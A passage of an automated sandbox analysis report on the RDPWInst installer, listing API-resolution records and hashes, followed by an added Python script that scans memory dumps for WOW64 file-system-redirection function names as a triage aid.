                                                    • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 1646373207-3689287502
                                                    • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                    • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                    • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                    • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 1646373207-1355242751
                                                    • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                    • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                    • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                    • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                    • API String ID: 1646373207-1127948838
                                                    • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                    • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                    • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                    • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D
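The three GetModuleHandleW/GetProcAddress records above show RDPWInst resolving Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection and GetDiskFreeSpaceExW from kernel32.dll by name at run time, so those names live in the binary as strings rather than in its static import directory. The redirect/restore pair is what a 32-bit process on 64-bit Windows needs to reach the native System32 directory instead of the SysWOW64 shadow, which is why it is worth a second look in an installer that also drops files under C:\Windows. The following Python is an added triage helper, not code from the Joe Sandbox report or from RDP Wrapper: it scans a raw dump for that string pattern and returns a verdict. The dump bytes, the function names and the "review" / "no pattern" labels are this example's own assumptions.

```python
"""Flag run-time resolution of WOW64 file-system-redirection APIs in a raw dump.

Added example for triaging records like the GetModuleHandleW/GetProcAddress
entries in the report.  The dump bytes below are constructed; nothing is read
from the sandbox's real .sdmp files.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List

# Export names the report shows being passed to GetProcAddress by name.
# Wow64DisableWow64FsRedirection lets a 32-bit process on 64-bit Windows open
# the native %SystemRoot%\System32 instead of the SysWOW64 shadow directory.
WATCHED_EXPORTS: Dict[bytes, str] = {
    b"Wow64DisableWow64FsRedirection": "disables WOW64 file-system redirection",
    b"Wow64RevertWow64FsRedirection": "restores WOW64 file-system redirection",
    b"GetDiskFreeSpaceExW": "free-space query (benign on its own)",
}
FS_REDIRECTION_PAIR = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}

# GetModuleHandleW takes a wide string, so the module name may sit in the dump
# as UTF-16-LE; GetProcAddress names are always ANSI.  Check both encodings.
KERNEL32_FORMS = (b"kernel32.dll", "kernel32.dll".encode("utf-16-le"))


@dataclass
class Hit:
    name: str
    offset: int
    meaning: str


def find_watched_exports(image: bytes) -> List[Hit]:
    """Return each NUL-terminated occurrence of a watched export name, sorted by offset."""
    hits: List[Hit] = []
    for needle, meaning in WATCHED_EXPORTS.items():
        for m in re.finditer(re.escape(needle) + rb"\x00", image):
            hits.append(Hit(needle.decode("ascii"), m.start(), meaning))
    return sorted(hits, key=lambda h: h.offset)


def references_kernel32(image: bytes) -> bool:
    """True if the module name appears in either ANSI or UTF-16-LE form (case-insensitive)."""
    lowered = image.lower()
    return any(form.lower() in lowered for form in KERNEL32_FORMS)


def classify(image: bytes) -> Dict[str, object]:
    """Triage verdict (this example's own labels): 'review' only when both
    redirection toggles and the kernel32 module name appear as strings,
    i.e. the disable/restore pair is being resolved dynamically."""
    hits = find_watched_exports(image)
    names = {h.name for h in hits}
    toggle = FS_REDIRECTION_PAIR <= names
    k32 = references_kernel32(image)
    return {
        "hits": hits,
        "kernel32_string": k32,
        "fs_redirection_toggle": toggle,
        "verdict": "review" if toggle and k32 else "no pattern",
    }


# Constructed dump fragments (not real sandbox data): the first mimics the
# string layout implied by the records above, the second a binary that only
# asks for free disk space.
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + "kernel32.dll\x00".encode("utf-16-le")  # wide string for GetModuleHandleW
    + b"Wow64DisableWow64FsRedirection\x00"
    + b"Wow64RevertWow64FsRedirection\x00"
    + b"GetDiskFreeSpaceExW\x00"
    + b"\x00" * 16
)
CONSTRUCTED_BENIGN = b"kernel32.dll\x00GetDiskFreeSpaceExW\x00"

if __name__ == "__main__":
    for label, image in (("sample", CONSTRUCTED_DUMP), ("benign", CONSTRUCTED_BENIGN)):
        result = classify(image)
        print(label, result["verdict"])
        for hit in result["hits"]:
            print(f"  {hit.offset:#06x} {hit.name}: {hit.meaning}")
```

Run it against a dumped image (for instance one of the .sdmp files listed in the report) by passing the file's bytes to classify(). The string match is a hint, not a verdict: a legitimate 32-bit installer that needs native System32 access carries the same pair, so the result should be weighed with the report's other signals (files dropped under C:\Windows, service and firewall changes). A fuller check would also confirm with a PE parser that the names are absent from the static import directory, which is what makes the run-time lookup notable.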